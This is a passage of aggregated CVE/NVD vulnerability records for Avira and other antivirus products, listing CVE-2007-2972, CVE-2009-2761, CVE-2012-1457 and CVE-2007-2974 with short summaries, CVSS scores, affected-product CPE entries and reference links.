                     name: "avira-antivir-upx-dos(34556)",
                     refsource: "XF",
                     url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34556",
                  },
                  {
                     name: "24187",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/24187",
                  },
                  {
                     name: "http://forum.antivir-pe.de/thread.php?threadid=22528",
                     refsource: "CONFIRM",
                     url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
                  },
                  {
                     name: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.011%5D%20-%20Avira%20Antivir%20Antivirus%20UPX%20parsing%20Divide%20by%20Zero%20Advisory.txt",
                     refsource: "MISC",
                     url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.011%5D%20-%20Avira%20Antivir%20Antivirus%20UPX%20parsing%20Divide%20by%20Zero%20Advisory.txt",
                  },
                  {
                     name: "ADV-2007-1971",
                     refsource: "VUPEN",
                     url: "http://www.vupen.com/english/advisories/2007/1971",
                  },
                  {
                     name: "36710",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/36710",
                  },
                  {
                     name: "25417",
                     refsource: "SECUNIA",
                     url: "http://secunia.com/advisories/25417",
                  },
                  {
                     name: "20070529 n.runs-SA-2007.011 - Avira Antivir Antivirus UPX parsing Divide by Zero Advisory",
                     refsource: "BUGTRAQ",
                     url: "http://www.securityfocus.com/archive/1/469880/100/0/threaded",
                  },
                  {
                     name: "20070529 n.runs-SA-2007.011 - Avira Antivir Antivirus UPX",
                     refsource: "FULLDISC",
                     url: "http://marc.info/?l=full-disclosure&m=118040810718045&w=2",
                  },
                  {
                     name: "1018132",
                     refsource: "SECTRACK",
                     url: "http://www.securitytracker.com/id?1018132",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2007-2972",
      datePublished: "2007-06-01T01:00:00",
      dateReserved: "2007-05-31T00:00:00",
      dateUpdated: "2024-08-07T13:57:54.603Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2009-2761
Vulnerability from cvelistv5
Published
2009-08-13 16:00
Modified
2024-08-07 05:59
Severity ?
Summary
Unquoted Windows search path vulnerability in the scheduler (sched.exe) in Avira AntiVir, AntiVir Premium, Premium Security Suite, and AntiVir Professional might allow local users to gain privileges via a malicious antivir.exe file in the "C:\Program Files\avira\" directory.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-07T05:59:57.149Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "55647",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://www.osvdb.org/55647",
               },
               {
                  name: "ADV-2008-3130",
                  tags: [
                     "vdb-entry",
                     "x_refsource_VUPEN",
                     "x_transferred",
                  ],
                  url: "http://www.vupen.com/english/advisories/2008/3130",
               },
               {
                  name: "avira-createprocess-privilege-escalation(46568)",
                  tags: [
                     "vdb-entry",
                     "x_refsource_XF",
                     "x_transferred",
                  ],
                  url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46568",
               },
               {
                  name: "20090115 [TZO-2009-2] Avira Antivir - Priviledge escalation",
                  tags: [
                     "mailing-list",
                     "x_refsource_FULLDISC",
                     "x_transferred",
                  ],
                  url: "http://archives.neohapsis.com/archives/bugtraq/2009-01/0146.html",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://blog.zoller.lu/2009/01/tzo-2009-2-avira-antivir-priviledge.html",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2009-01-15T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Unquoted Windows search path vulnerability in the scheduler (sched.exe) in Avira AntiVir, AntiVir Premium, Premium Security Suite, and AntiVir Professional might allow local users to gain privileges via a malicious antivir.exe file in the \"C:\\Program Files\\avira\\\" directory.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2017-08-16T14:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "55647",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://www.osvdb.org/55647",
            },
            {
               name: "ADV-2008-3130",
               tags: [
                  "vdb-entry",
                  "x_refsource_VUPEN",
               ],
               url: "http://www.vupen.com/english/advisories/2008/3130",
            },
            {
               name: "avira-createprocess-privilege-escalation(46568)",
               tags: [
                  "vdb-entry",
                  "x_refsource_XF",
               ],
               url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46568",
            },
            {
               name: "20090115 [TZO-2009-2] Avira Antivir - Priviledge escalation",
               tags: [
                  "mailing-list",
                  "x_refsource_FULLDISC",
               ],
               url: "http://archives.neohapsis.com/archives/bugtraq/2009-01/0146.html",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://blog.zoller.lu/2009/01/tzo-2009-2-avira-antivir-priviledge.html",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2009-2761",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Unquoted Windows search path vulnerability in the scheduler (sched.exe) in Avira AntiVir, AntiVir Premium, Premium Security Suite, and AntiVir Professional might allow local users to gain privileges via a malicious antivir.exe file in the \"C:\\Program Files\\avira\\\" directory.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "55647",
                     refsource: "OSVDB",
                     url: "http://www.osvdb.org/55647",
                  },
                  {
                     name: "ADV-2008-3130",
                     refsource: "VUPEN",
                     url: "http://www.vupen.com/english/advisories/2008/3130",
                  },
                  {
                     name: "avira-createprocess-privilege-escalation(46568)",
                     refsource: "XF",
                     url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46568",
                  },
                  {
                     name: "20090115 [TZO-2009-2] Avira Antivir - Priviledge escalation",
                     refsource: "FULLDISC",
                     url: "http://archives.neohapsis.com/archives/bugtraq/2009-01/0146.html",
                  },
                  {
                     name: "http://blog.zoller.lu/2009/01/tzo-2009-2-avira-antivir-priviledge.html",
                     refsource: "MISC",
                     url: "http://blog.zoller.lu/2009/01/tzo-2009-2-avira-antivir-priviledge.html",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2009-2761",
      datePublished: "2009-08-13T16:00:00",
      dateReserved: "2009-08-13T00:00:00",
      dateUpdated: "2024-08-07T05:59:57.149Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

Vulnerability from fkie_nvd
Published
2012-03-21 10:11
Modified
2024-11-21 01:37
Severity ?
Summary
The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.
References
cve@mitre.orghttp://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html
cve@mitre.orghttp://osvdb.org/80389
cve@mitre.orghttp://osvdb.org/80391
cve@mitre.orghttp://osvdb.org/80392
cve@mitre.orghttp://osvdb.org/80393
cve@mitre.orghttp://osvdb.org/80395
cve@mitre.orghttp://osvdb.org/80396
cve@mitre.orghttp://osvdb.org/80403
cve@mitre.orghttp://osvdb.org/80406
cve@mitre.orghttp://osvdb.org/80407
cve@mitre.orghttp://osvdb.org/80409
cve@mitre.orghttp://www.ieee-security.org/TC/SP2012/program.html
cve@mitre.orghttp://www.mandriva.com/security/advisories?name=MDVSA-2012:094
cve@mitre.orghttp://www.securityfocus.com/archive/1/522005
cve@mitre.orghttp://www.securityfocus.com/bid/52610
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/74293
af854a3a-2127-422b-91ae-364da2661108http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80389
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80391
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80392
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80393
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80395
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80396
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80403
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80406
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80407
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80409
af854a3a-2127-422b-91ae-364da2661108http://www.ieee-security.org/TC/SP2012/program.html
af854a3a-2127-422b-91ae-364da2661108http://www.mandriva.com/security/advisories?name=MDVSA-2012:094
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/archive/1/522005
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/bid/52610
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/74293



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:aladdin:esafe:7.0.17.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "5C6590DF-9164-4A76-ADEE-9110C5E3588E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:alwil:avast_antivirus:4.8.1351.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "5A3A2FBE-3113-4CCB-8FCF-54CBD78FDF52",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:alwil:avast_antivirus:5.0.677.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "7877C5C9-C4CA-406F-A61A-EAFBA846A20D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:anti-virus:vba32:3.12.14.2:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A0325DA-A137-41E0-BD5E-B892F2166749",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:antiy:avl_sdk:2.0.3.7:*:*:*:*:*:*:*",
                     matchCriteriaId: "38855431-9C17-41FE-8325-A3304DECAC92",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:authentium:command_antivirus:5.2.11.5:*:*:*:*:*:*:*",
                     matchCriteriaId: "192DFD98-11AA-4E7A-A1CB-53FC06FEB20F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avg:avg_anti-virus:10.0.0.1190:*:*:*:*:*:*:*",
                     matchCriteriaId: "4E62090C-AF41-4032-B9F7-78FEBDB4AAE1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:7.11.1.163:*:*:*:*:*:*:*",
                     matchCriteriaId: "62B656B8-A7FB-4451-8A32-CB7AB74165F0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:bitdefender:bitdefender:7.2:*:*:*:*:*:*:*",
                     matchCriteriaId: "24D7D7FA-20E9-4560-ABC6-154CD918E307",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:cat:quick_heal:11.00:*:*:*:*:*:*:*",
                     matchCriteriaId: "343D3F40-E028-4AEE-82A4-0A17C1D1ED13",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:clamav:clamav:0.96.4:*:*:*:*:*:*:*",
                     matchCriteriaId: "953C363B-AD5B-4C53-AAF0-AB6BA4040D74",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:emsisoft:anti-malware:5.1.0.1:*:*:*:*:*:*:*",
                     matchCriteriaId: "488ED4D6-0A32-43D5-840C-F76919C41C45",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:eset:nod32_antivirus:5795:*:*:*:*:*:*:*",
                     matchCriteriaId: "673B999A-11D2-4AFF-9930-0C06E8BBAA7F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:f-prot:f-prot_antivirus:4.6.2.117:*:*:*:*:*:*:*",
                     matchCriteriaId: "961708EB-3124-4147-A36D-BAD9241D0C88",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:gdata-software:g_data_antivirus:21:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA047323-54B7-460B-9AA0-88C3C4183218",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:ikarus:ikarus_virus_utilities_t3_command_line_scanner:1.1.97.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "1759C4A5-67D1-4722-954A-883694E57FAB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:jiangmin:jiangmin_antivirus:13.0.900:*:*:*:*:*:*:*",
                     matchCriteriaId: "620DC756-B821-413C-A824-43C221E573AA",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:k7computing:antivirus:9.77.3565:*:*:*:*:*:*:*",
                     matchCriteriaId: "B27BD224-CB70-43D2-8B0D-9F229A646B82",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:kaspersky:kaspersky_anti-virus:7.0.0.125:*:*:*:*:*:*:*",
                     matchCriteriaId: "FD9BCB3B-0FE8-4716-ABC2-1DB89D330F56",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:mcafee:gateway:2010.1c:*:*:*:*:*:*:*",
                     matchCriteriaId: "18FC30B1-4FB3-4891-93FE-63A93E686EB3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:mcafee:scan_engine:5.400.0.1158:*:*:*:*:*:*:*",
                     matchCriteriaId: "0BCE1228-61BE-4C10-898A-B8BDC5A71156",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:microsoft:security_essentials:2.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "7C382AA8-5E99-4669-9825-F5BBEEC12907",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:norman:norman_antivirus_\\&_antispyware:6.06.12:*:*:*:*:*:*:*",
                     matchCriteriaId: "81D01633-1000-425D-9026-59C50734956A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:pc_tools:pc_tools_antivirus:7.0.3.5:*:*:*:*:*:*:*",
                     matchCriteriaId: "410EEFDA-CFE6-4DDE-B661-BB01009B0E60",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:rising-global:rising_antivirus:22.83.00.03:*:*:*:*:*:*:*",
                     matchCriteriaId: "EF8ADA91-4042-4E1B-9F14-78023F24B137",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:symantec:endpoint_protection:11.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "E269D396-3A70-4C4B-9D79-CBBA75C280D8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:trendmicro:housecall:9.120.0.1004:*:*:*:*:*:*:*",
                     matchCriteriaId: "B3C3D7B7-3DD1-417E-9488-A3B0F28F75E1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:trendmicro:trend_micro_antivirus:9.120.0.1004:*:*:*:*:*:*:*",
                     matchCriteriaId: "72379F97-0BCA-425A-92AE-9F336866FD07",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:virusbuster:virusbuster:13.6.151.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "32C656A2-AAAC-494A-A981-A83144070857",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.",
      },
      {
         lang: "es",
         value: "El analizador de archivos TAR en Avira AntiVir versión 7.11.1.163, Antiy Labs AVL SDK versión 2.0.3.7, avast! antivirus versiones 4.8.1351.0 y 5.0.677.0, AVG Anti-Virus versión 10.0.0.1190, Bitdefender versión 7.2, Quick Heal (también se conoce como Cat QuickHeal) versión 11.00, ClamAV versión 0.96.4, Command Antivirus versión 5.2.11.5, Emsisoft Anti-Malware versión 5.1.0.1, eSafe versión 7.0.17.0, F-Prot antivirus versión 4.6.2.117, G Data AntiVirus versión 21, Ikarus Virus Utilities T3 Command Line Scanner versión 1.1.97.0, Jiangmin Antivirus versión 13.0.900, K7 AntiVirus versión 9.77.3565, Kaspersky Anti-Virus versión 7.0.0.125, McAfee Anti-Virus Scanning Engine versión 5.400.0.1158, McAfee Gateway (anteriormente Webwasher) versión 2010.1C, Antimalware Engine versión 1.1.6402.0 en Microsoft Security Essentials versión 2.0, NOD32 Antivirus versión 5795, Norman Antivirus versión 6.06.12 , PC Tools AntiVirus versión 7.0.3.5, Rising Antivirus versión 22.83.00.03, AVEngine versión 20101.3.0.103 en Symantec Endpoint Protection versión 11, Trend Micro AntiVirus versión 9.120.0.1004, Trend Micro HouseCall versión 9.120.0.1004, VBA32 versión 3.12.14.2 y VirusBuster versión 13.6.151.0 , permite a los atacantes remotos omitir la detección de malware por medio de una entrada de archivo TAR con un campo de longitud que supera el tamaño total del archivo TAR. NOTA: esto puede ser más tarde SPLIT en varios CVE si se publica información adicional que muestra que el error se produjo de manera independiente en diferentes implementaciones de analizador de TAR.",
      },
   ],
   id: "CVE-2012-1457",
   lastModified: "2024-11-21T01:37:01.753",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "MEDIUM",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "NONE",
               baseScore: 4.3,
               confidentialityImpact: "NONE",
               integrityImpact: "PARTIAL",
               vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
               version: "2.0",
            },
            exploitabilityScore: 8.6,
            impactScore: 2.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2012-03-21T10:11:49.287",
   references: [
      {
         source: "cve@mitre.org",
         url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80389",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80391",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80392",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80393",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80395",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80396",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80403",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80406",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80407",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80409",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.ieee-security.org/TC/SP2012/program.html",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/archive/1/522005",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/bid/52610",
      },
      {
         source: "cve@mitre.org",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74293",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80389",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80391",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80392",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80393",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80395",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80396",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80403",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80406",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80407",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80409",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.ieee-security.org/TC/SP2012/program.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/archive/1/522005",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/bid/52610",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74293",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-264",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2007-06-01 01:30
Modified
2024-11-21 00:32
Severity ?
Summary
Buffer overflow in the file parsing engine in Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to execute arbitrary code via a crafted LZH archive file, resulting from an "integer cast around."
References
cve@mitre.orghttp://forum.antivir-pe.de/thread.php?threadid=22528Patch
cve@mitre.orghttp://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063624.html
cve@mitre.orghttp://osvdb.org/36712
cve@mitre.orghttp://secunia.com/advisories/25417Patch, Vendor Advisory
cve@mitre.orghttp://securityreason.com/securityalert/2764
cve@mitre.orghttp://securitytracker.com/id?1018131
cve@mitre.orghttp://www.nruns.com/advisories/%5Bn.runs-SA-2007.010%5D%20-%20Avira%20Antivir%20Antivirus%20LZH%20parsing%20Arbitrary%20Code%20Execution%20Advisory.txtPatch, Vendor Advisory
cve@mitre.orghttp://www.securityfocus.com/archive/1/469805/100/0/threaded
cve@mitre.orghttp://www.securityfocus.com/bid/24187Patch
cve@mitre.orghttp://www.vupen.com/english/advisories/2007/1971
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/34551
af854a3a-2127-422b-91ae-364da2661108http://forum.antivir-pe.de/thread.php?threadid=22528Patch
af854a3a-2127-422b-91ae-364da2661108http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063624.html
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/36712
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/25417Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://securityreason.com/securityalert/2764
af854a3a-2127-422b-91ae-364da2661108http://securitytracker.com/id?1018131
af854a3a-2127-422b-91ae-364da2661108http://www.nruns.com/advisories/%5Bn.runs-SA-2007.010%5D%20-%20Avira%20Antivir%20Antivirus%20LZH%20parsing%20Arbitrary%20Code%20Execution%20Advisory.txtPatch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/archive/1/469805/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/bid/24187Patch
af854a3a-2127-422b-91ae-364da2661108http://www.vupen.com/english/advisories/2007/1971
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/34551
Impacted products
Vendor Product Version
avira antivir *
avira av_pack *



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:avira:antivir:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "445D730C-D41D-4014-8F47-42941554D65A",
                     versionEndIncluding: "7.04.00.23",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:av_pack:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A9634F84-4E81-45F8-B040-9E08B30BF190",
                     versionEndIncluding: "7.03.00.08",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Buffer overflow in the file parsing engine in Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to execute arbitrary code via a crafted LZH archive file, resulting from an \"integer cast around.\"",
      },
      {
         lang: "es",
         value: "Desbordamiento de búfer en el motor de análisis sintáctico de ficheros en el Antivirus Avira Antivir anterior al 7.03.00.09 permite a atacantes remotos ejecutar código de su elección a través de un fichero LZH modificado, resultado de un \"redondeo de conversión a entero\".",
      },
   ],
   id: "CVE-2007-2974",
   lastModified: "2024-11-21T00:32:06.130",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 10,
               confidentialityImpact: "COMPLETE",
               integrityImpact: "COMPLETE",
               vectorString: "AV:N/AC:L/Au:N/C:C/I:C/A:C",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 10,
            obtainAllPrivilege: true,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2007-06-01T01:30:00.000",
   references: [
      {
         source: "cve@mitre.org",
         tags: [
            "Patch",
         ],
         url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
      },
      {
         source: "cve@mitre.org",
         url: "http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063624.html",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/36712",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Patch",
            "Vendor Advisory",
         ],
         url: "http://secunia.com/advisories/25417",
      },
      {
         source: "cve@mitre.org",
         url: "http://securityreason.com/securityalert/2764",
      },
      {
         source: "cve@mitre.org",
         url: "http://securitytracker.com/id?1018131",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Patch",
            "Vendor Advisory",
         ],
